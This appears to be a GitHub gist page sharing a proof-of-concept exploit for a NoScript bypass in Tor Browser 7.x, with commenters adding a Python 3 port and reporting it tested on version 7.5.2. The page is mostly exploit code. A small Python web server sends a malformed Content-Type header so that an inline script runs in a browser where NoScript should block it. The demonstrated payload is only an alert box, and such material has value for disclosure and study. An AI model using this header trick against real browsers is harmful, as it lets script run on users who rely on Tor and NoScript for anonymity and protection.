Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
| #!/usr/bin/python | |
| from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer | |
| PORT_NUMBER = 31337 | |
| class myHandler(BaseHTTPRequestHandler): | |
| #Handler for the GET requests | |
| def do_GET(self): | |
| self.send_response(200) | |
| self.send_header('Content-type','text/html;/json') # Here is where the magic happens | |
| self.end_headers() | |
| self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>") | |
| return | |
| try: | |
| server = HTTPServer(('', PORT_NUMBER), myHandler) | |
| print 'Started httpserver on port ' , PORT_NUMBER | |
| server.serve_forever() | |
| except KeyboardInterrupt: | |
| print '^C received, shutting down the web server' | |
| server.socket.close() |
This comment has been minimized.
This comment has been minimized.
|
Python3 version: #!/usr/bin/python
from http.server import BaseHTTPRequestHandler, HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print('Started httpserver on port %s' % PORT_NUMBER)
server.serve_forever()
except KeyboardInterrupt:
print('^C received, shutting down the web server')
server.socket.close() |
This comment has been minimized.
This comment has been minimized.
|
@brammittendorff many thanks in advance for the Python3 version, but there is a small mistake regarding the exploit: Tested on Tor 7.5.2 Thanks! |
This comment has been minimized.
This comment has been minimized.
|
@jorgeluengar you are right, fixed my comment thanks! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
2 hacky wacky 4 me